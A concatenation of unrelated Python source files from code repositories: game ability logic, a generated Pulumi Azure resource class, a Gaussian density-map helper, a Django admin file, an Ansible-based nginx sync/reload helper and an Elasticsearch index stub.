if effect['name'] == 'toughness':
x = 1
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY and not x:
toughness1 = {'name': 'toughness',
'type': 'MPboost',
'situation': 'turnBegin',
'value': 1,
'duration_type': 'until_turns',
'duration': 1,
'source': self} # utile uniquement pour une future application d'affichage d'effet
toughness2 = {'name': 'toughness',
'type': 'MPboost',
'situation': 'turnBegin',
'value': 1,
'duration_type': 'until_turns',
'duration': 2,
'source': self}
self.effects.append(toughness1)
self.effects.append(toughness2)
self.stats['MP'] += 2
self.stats['EP'] -= ct.VK_ABILITIES['ability_4']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_4']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_4', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_4')
self.effectsClean()
def Ability5(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_5']['minRange'],
ct.VK_ABILITIES['ability_5']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_5']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_5']['MPcost']:
for effect in self.effects:
if effect['name'] == 'charge':
x += 1
if lastCell in self.targetedCells:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_5']['value'], False, True, 'ability_5')
game.collisionCalculator(entity, 1+x, self, False)
self.stats['EP'] -= ct.VK_ABILITIES['ability_5']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_5']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_5', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_5')
self.effectsClean()
def Ability6(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_6']['minRange'],
ct.VK_ABILITIES['ability_6']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_6']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_6']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_6':
x = 1
if lastCell in self.targetedCells and not x:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY and not x:
sharpened = {'name': 'sharpened',
'type': 'damage_%',
'situation': 'attacking',
'value': ct.VK_ABILITIES['ability_6']['value'],
'duration_type': 'next_attack',
'duration': 1,
'source': self}
self.effects.append(sharpened)
self.stats['EP'] -= ct.VK_ABILITIES['ability_6']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_6']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_6', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_6')
self.effectsClean()
def Ability7(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_7']['minRange'],
ct.VK_ABILITIES['ability_7']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_7']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_7']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_7':
x += 1
if lastCell in self.targetedCells and x < 2:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity,
ct.VK_ABILITIES['ability_7']['value'], False, True, 'ability_7')
game.collisionCalculator(entity, 2, self, False)
game.collisionCalculator(self, 2, self, False)
self.stats['EP'] -= ct.VK_ABILITIES['ability_7']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_7']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_7', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_7')
self.effectsClean()
def Ability8(self, selectedcell, lastCell, game):
hit = False
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_8']['minRange'],
ct.VK_ABILITIES['ability_8']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif selectedcell:
if selectedcell in self.targetedCells:
if len(self.played_abilities) >= 2:
if self.Passive3 in self.passives and self.played_abilities[len(self.played_abilities)-1] == 'ability_2' and \
self.played_abilities[len(self.played_abilities)-2] == 'ability_2':
x = 1
path = game.pathMultiplicator(selectedcell, self)
if x == 1:
for cell in game.groundCells:
if (self.coordX-1 == cell.coordX or self.coordX+1 == cell.coordX) and \
self.coordY-1 <= cell.coordY <= self.coordY+1:
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif (self.coordY-1 == cell.coordY or self.coordY+1 == cell.coordY) and \
self.coordX-1 <= cell.coordX <= self.coordX+1:
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
else:
for cell in game.groundCells:
if path[1] == 'right' or path[1] == 'left':
if cell.coordX == selectedcell.coordX and \
(cell.coordY-1 == selectedcell.coordY or \
cell.coordY+1 == selectedcell.coordY):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
elif path[1] == 'top' or path[1] == 'bottom':
if cell.coordY == selectedcell.coordY and \
(cell.coordX-1 == selectedcell.coordX or \
cell.coordX+1 == selectedcell.coordX):
if not cell in self.zoneCells:
self.zoneCells.append(cell)
elif cell in self.zoneCells:
self.zoneCells.remove(cell)
for cell in self.zoneCells:
if selectedcell in self.targetedCells:
cell.cellType = 'SelectedCell'
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_8']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_8']['MPcost']:
if lastCell in self.targetedCells:
for entity in game.entityList:
for cell2 in self.zoneCells:
if entity.coordX == cell2.coordX and \
entity.coordY == cell2.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_8']['value'], False, False, 'ability_8')
hit = True
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_8']['value'], False, True, 'ability_8')
hit = True
if hit:
self.stats['EP'] -= ct.VK_ABILITIES['ability_8']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_8']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_8', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.zoneCells = []
self.played_abilities.append('ability_8')
self.effectsClean()
def Ability9(self, selectedcell, lastCell, game):
x, y = 0, 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_9']['minRange'],
ct.VK_ABILITIES['ability_9']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_9']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_9']['MPcost']:
if lastCell in self.targetedCells:
for entity2 in game.entityList:
if entity2.controller.team == self.controller.team:
for effect in self.effects:
if effect['name'] == 'VKshield' and \
effect['source'] == self:
x += 1
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
if x < 1 and not self.Passive4 in self.passives:
vkShield = {'name': 'VKshield',
'type': 'damage_%',
'situation': 'defending',
'value': 0.10,
'duration_type': 'until_turns',
'duration': 2,
'source': self}
y = 1
elif x < 2 and self.Passive4 in self.passives:
vkShield = {'name': 'VKshield',
'type': 'damage_%',
'situation': 'defending',
'value': 0.15,
'duration_type': 'until_turns',
'duration': 3,
'source': self}
y = 1
if y:
self.effects.append(vkShield)
self.stats['EP'] -= ct.VK_ABILITIES['ability_9']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_9']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_9', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_9')
self.effectsClean()
def Ability10(self, selectedcell, lastCell, game):
x = 0
if not self.targetedCells:
self.targetedCells = game.rangeCalculator(self,
ct.VK_ABILITIES['ability_10']['minRange'],
ct.VK_ABILITIES['ability_10']['maxRange'],
True, False)
game.hideCells(self.targetedCells)
elif lastCell and not selectedcell and \
self.stats['EP'] >= ct.VK_ABILITIES['ability_10']['EPcost'] and \
self.stats['MP'] >= ct.VK_ABILITIES['ability_10']['MPcost']:
for ability in self.played_abilities:
if ability == 'ability_10':
x += 1
if lastCell in self.targetedCells and x < 2:
for entity in game.entityList:
if entity.coordX == lastCell.coordX and \
entity.coordY == lastCell.coordY:
entity.stats['health'] += game.valueCalculator(self, entity, ct.VK_ABILITIES['ability_10']['value'], False, False, 'ability_10', True)
if entity.stats['health'] > entity.Startstats['health']:
entity.stats['health'] = entity.Startstats['health']
self.stats['EP'] -= ct.VK_ABILITIES['ability_10']['EPcost']
self.stats['MP'] -= ct.VK_ABILITIES['ability_10']['MPcost']
for button in game.buttons:
if button[2]:
button[0].texture = Texture('Images/In-Game Ui/Ability(Grey).PNG')
button[2] = False
self.action_sender('ability_10', [lastCell.coordX, lastCell.coordY])
game.active_player.selectedAbility = None
game.hideCells(self.targetedCells)
self.targetedCells = None
game.lastCell = None
game.selectedcell = None
self.played_abilities.append('ability_10')
self.effectsClean()
def Passive1(self):
if self.controller.isPlaying and len(self.moveSteps):
charge = {'name': 'charge',
'type': 'damage_%',
'situation': 'attacking',
'value': 0.05,
'duration_type': 'next_attack',
'duration': 1,
'source': self}
x = len(self.moveSteps)-1
if self.lastMove == None:
self.lastMove = self.moveSteps[x]
self.effects.append(charge)
print('charge +1')
elif self.lastMove == self.moveSteps[x]:
self.effects.append(charge)
print('charge +1')
elif self.lastMove != self.moveSteps[x]:
y = []
for effect in self.effects:
if effect['name'] == 'charge':
y.append(effect)
for effect2 in y:
self.effects.remove(effect2)
del effect2
print('charge reset')
self.effects.append(charge)
self.lastMove = self.moveSteps[x]
print('charge +1')
def Passive2(self):
hardHead = {'name': 'hardHead',
'type': 'damage_%',
'situation': 'defending_front',
'value': 0.15,
'duration_type': 'infinitely',
'duration': 999,
'source': self}
if not hardHead in self.effects:
self.effects.append(hardHead)
def Passive3(self):
pass # active les combos si présent dans self.passives
def Passive4(self):
pass # booste l'actif 9'
def Passive5(self):
certifiedRunner = {'name': 'certifiedRunner',
'type': 'MPboost',
'situation': 'turnBegin',
'value': 1,
'duration_type': 'infinitely',
'duration': 999,
'source': self}
if not certifiedRunner in self.effects:
self.effects.append(certifiedRunner)
def Passive6(self):
HealthyArmor = {'name': 'HealthyArmor',
'type': 'HPboost',
'situation': 'gameBegin',
'value': 30,
'duration_type': 'infinitely',
'duration': 999,
'source': self}
if not HealthyArmor in self.effects:
self.effects.append(HealthyArmor)
self.stats['health'] += 30
self.Startstats['health'] += 30
| [
"ridel.timothe@outlook.com"
] | ridel.timothe@outlook.com |
538609c419c2927cdc8dfadedbe9bd4adf2e7c9f | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/datashare/v20201001preview/data_set_mapping.py | e00a71eae41a251fe545b0c3ef3d7cbfc785120d | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 12,170 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['DataSetMappingArgs', 'DataSetMapping']
@pulumi.input_type
class DataSetMappingArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
kind: pulumi.Input[Union[str, 'DataSetMappingKind']],
resource_group_name: pulumi.Input[str],
share_subscription_name: pulumi.Input[str],
data_set_mapping_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DataSetMapping resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "kind", kind)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_subscription_name", share_subscription_name)
if data_set_mapping_name is not None:
pulumi.set(__self__, "data_set_mapping_name", data_set_mapping_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the share account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[Union[str, 'DataSetMappingKind']]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[Union[str, 'DataSetMappingKind']]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareSubscriptionName")
def share_subscription_name(self) -> pulumi.Input[str]:
"""
The name of the share subscription which will hold the data set sink.
"""
return pulumi.get(self, "share_subscription_name")
@share_subscription_name.setter
def share_subscription_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_subscription_name", value)
@property
@pulumi.getter(name="dataSetMappingName")
def data_set_mapping_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the data set mapping to be created.
"""
return pulumi.get(self, "data_set_mapping_name")
@data_set_mapping_name.setter
def data_set_mapping_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_mapping_name", value)
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
class DataSetMapping(pulumi.CustomResource):
warnings.warn("""Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""", DeprecationWarning)
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
:param pulumi.Input[Union[str, 'DataSetMappingKind']] kind: Kind of data set mapping.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DataSetMappingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A data set mapping data transfer object.
:param str resource_name: The name of the resource.
:param DataSetMappingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DataSetMappingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[Union[str, 'DataSetMappingKind']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
pulumi.log.warn("""DataSetMapping is deprecated: Please use one of the variants: ADLSGen2FileDataSetMapping, ADLSGen2FileSystemDataSetMapping, ADLSGen2FolderDataSetMapping, ADLSGen2StorageAccountDataSetMapping, BlobContainerDataSetMapping, BlobDataSetMapping, BlobFolderDataSetMapping, BlobStorageAccountDataSetMapping, KustoClusterDataSetMapping, KustoDatabaseDataSetMapping, SqlDBTableDataSetMapping, SqlDWTableDataSetMapping, SynapseWorkspaceSqlPoolTableDataSetMapping.""")
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["data_set_mapping_name"] = data_set_mapping_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = kind
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_subscription_name is None and not opts.urn:
raise TypeError("Missing required property 'share_subscription_name'")
__props__.__dict__["share_subscription_name"] = share_subscription_name
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:DataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20200901:DataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:DataSetMapping")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DataSetMapping, __self__).__init__(
'azure-native:datashare/v20201001preview:DataSetMapping',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DataSetMapping':
"""
Get an existing DataSetMapping resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DataSetMappingArgs.__new__(DataSetMappingArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DataSetMapping(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of data set mapping.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
| [
"noreply@github.com"
] | morrell.noreply@github.com |
065035ff3eb81ee732f12a8631ea414bd57750f8 | 395c0893c7d69abd44cd4bb385771da7adb8bbb9 | /yiyuUtil/image_base/density_map_gaussian.py | 85040c6678a2825ce62f41805dde30bb041b9424 | [] | no_license | YiyuJia/pyUtil | 79a607744481c8af621e54623a7449741c13542e | 37fdc4d697f53e1745f006cbffc740f0487dcc38 | refs/heads/master | 2020-03-28T16:36:08.813486 | 2018-09-14T01:34:15 | 2018-09-14T01:34:15 | 148,244,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,895 | py | import numpy as np
def fspecial_gaussian(shape, sigma):
''' MATLAB-mimicking implementation from GitHub:
https://stackoverflow.com/questions/17190649/
how-to-obtain-a-gaussian-filter-in-python '''
m,n = [(ss-1)/2 for ss in shape]
y,x = np.ogrid[-m:m+1, -n:n+1]
h = np.exp( -(x*x + y*y) / (2*sigma*sigma) )
h[h < np.finfo(h.dtype).eps*h.max()] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
return(h)
def get_density_map_gaussian(image_data, annotation_data, is_verbose=False):
''' Python implementation of the method in the repo '''
h, w = image_data.shape[:2]
image_density = np.zeros((h, w))
n_annotations = annotation_data.shape[0]
H = fspecial_gaussian(shape=(15, 15), sigma=4.0)
if n_annotations == 0:
return(image_density)
if n_annotations == 1:
x = max(0, min(w - 1, int(np.round(annotation_data[0, 0]))))
y = max(0, min(h - 1, int(np.round(annotation_data[0, 1]))))
image_density[y, x] = 255
return(image_density)
for k in range(annotation_data.shape[0]):
x = max(0, min(w - 1, int(np.round(annotation_data[k, 0]))))
y = max(0, min(h - 1, int(np.round(annotation_data[k, 1]))))
x1 = x - 7
x2 = x + 7
y1 = y - 7
y2 = y + 7
dfx1, dfy1, dfx2, dfy2 = (0, 0, 0, 0)
change_H = False
if x1 < 0:
dfx1 = np.abs(x1)
x1 = 0
change_H = True
if y1 < 0:
dfy1 = np.abs(y1)
y1 = 0
change_H = True
if x2 >= w:
dfx2 = x2 - w + 1
x2 = w - 1
change_H = True
if y2 >= h:
dfy2 = y2 - h + 1
y2 = h - 1
change_H = True
if is_verbose:
print('w: {}, h: {}'.format(w, h))
print('x1: {}, x2: {}, y1: {}, y2: {}'.format(x1, x2, y1, y2))
print('dfx1: {}, dfx2: {}, dfy1: {}, dfy2: {}'.format(
dfx1, dfx2, dfy1, dfy2))
H_mod = fspecial_gaussian(
shape=(15 - (dfy1 + dfy2), 15 - (dfx1 + dfx2)),
sigma=4.0) if change_H else H
image_density[y1:y2+1, x1:x2+1] += H_mod
return(image_density)
| [
"yiyu.jia@live.com"
] | yiyu.jia@live.com |
4318de44fe9fe2d57ceebab18d1f2f5cb82599e6 | 1df4415ac1a8bd65964d01bc6848e6648f0b7665 | /core/admin.py | 728f1a52f0015417e9f1c6d73237441834b60aa8 | [] | no_license | BerkeleyBiostats/tlapp | c64c693961b841d1c81401deb96b419052a78620 | ed5320e5f21420f41f294dc694c7eede69cfe5ff | refs/heads/master | 2022-12-14T02:03:09.896481 | 2020-01-29T22:23:07 | 2020-01-29T22:23:07 | 99,958,467 | 1 | 0 | null | 2022-03-29T21:55:20 | 2017-08-10T19:34:02 | JavaScript | UTF-8 | Python | false | false | 678 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from . import models
# Register your models here.
admin.site.register(models.AnalysisTemplate)
admin.site.register(models.Dataset)
admin.site.register(models.Token)
@admin.register(models.ModelRun)
class ModelRunAdmin(admin.ModelAdmin):
fields = (
"created_by",
"status",
"backend",
"ghap_username",
"ghap_ip",
"base_url",
"title",
"output_url",
"traceback",
"model_template",
"dataset",
"postprocessing_attempts",
"postprocessing_attempted_at",
"postprocessing_traceback",
"is_batch",
"last_heartbeat",
"inputs",
"code",
"provision",
)
| [
"marc@rvit.co"
] | marc@rvit.co |
4da7de01183199fb81154b4fe45ed83c89dd26ce | ea45ed4c0b35474a24b22bc7e5b4e9ade6046ce8 | /nginx_platform_backend/libs/ansible_hepler/my_runner.py | 20306f18cfc05f1d54888f17494c904fed1cf6b6 | [] | no_license | feamon/Nginx-Consul-Api | c45e08f2270535a77d25adfa974341f409eddc0d | 67f52f28ff9449432cd8ccd54f8693cec1cdde24 | refs/heads/master | 2023-07-13T03:47:41.408104 | 2021-08-26T12:34:45 | 2021-08-26T12:34:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,529 | py | # -*- coding:utf-8 -*-
import sys
from pathlib import Path
from multiprocessing import current_process
sys.path.append(str(Path(__file__).resolve().parents[3]))
from libs.ansible_hepler.runner import Runner
from utils.logging import get_logger
error_logger = get_logger('log_error')
info_logger = get_logger('log_info')
def NginxAnsibleCmd(**kwargs):
"""
远程执行sync, reload nginx
:param kwargs:
:return:
"""
# import socket
# 获取程序本地运行IP,获取生成配置文件使用
# try:
# processIp = socket.gethostbyname(socket.gethostname())
# print(processIp)
# except Exception as e:
# error_logger.error(str(e))
# return {'status': 500, 'msg': "获取系统IP错误!! 详情:" + str(e)}
try:
current_process()._config = {'semprefix': '/mp'}
print(current_process()._config)
res = [{'username': 'root', 'hostname': kwargs['ansibleIp']}]
tqm = Runner(res)
# 判断操作类型, sync or reload
if kwargs['type'] == 'sync':
# {'ansibleIp': '10.0.0.80', 'type': 'sync', 'srcFile': '/tmp/luffy.ob1api.com.conf', 'destPath': '/etc/nginx/conf.d/', 'syncCmd': ''}
import subprocess
val = subprocess.check_call('scp -P 22 {0} root@{1}:{2}'.format(kwargs['srcFile'], kwargs['ansibleIp'], kwargs['destPath']), shell=True)
if val is not 0:
return
command = "bash {0}".format(kwargs['syncCmd'])
# command = "scp -P 22 {0} root@{1}:{2} && bash {3}".format(kwargs['srcFile'], "10.0.0.1", kwargs['destPath'], kwargs['syncCmd'])
print(command)
elif kwargs['type'] == "add_dump":
command = "bash {0} {1}".format(kwargs['addCmd'], kwargs['domain'])
print(command)
# 远程到 ansible 主机 dump 文件 ; 操作ansible主机上的脚本
elif kwargs['type'] == "reload":
command = kwargs['reloadCmd']
print(command)
elif kwargs['type'] == 'rmConf':
command = "bash {0} {1}".format(kwargs['rmCmd'], kwargs['rmConf'])
elif kwargs['type'] == 'justSync':
command = "bash {0}".format(kwargs['syncCmd'])
else:
return {'status': 500, 'msg': "type非法参数!!"}
ret = tqm.run(module_args=command)
# print(ret)
return {"status": 20000, "data": ret}
except Exception as e:
error_logger.info(str(e))
return {'status': 500, 'msg': str(e)}
| [
"ywl1006@outlook.com"
] | ywl1006@outlook.com |
e79fb1916d742af9ebab6860a5bdb652ce86a1d1 | ede6ee7bdbd76dbb39ffcddfc98725062566ebf4 | /barbados/indexes/list.py | 6c9b98ec709fd610d48643a70555b79387304c46 | [] | no_license | cohoe/barbados | cfa3cb4fab8c183fc4a4f943f452a89ebe193ea2 | 343f8fd4ac1f18e5e93d519cbc064693280e4d00 | refs/heads/master | 2021-08-07T12:33:53.263230 | 2021-07-18T01:59:16 | 2021-07-18T01:59:16 | 234,824,108 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | from elasticsearch_dsl import Document, Text, InnerDoc, Object
from barbados.indexes.base import BaseIndex, BarbadosIndex
class ListItemIndex(InnerDoc):
cocktail_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
spec_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
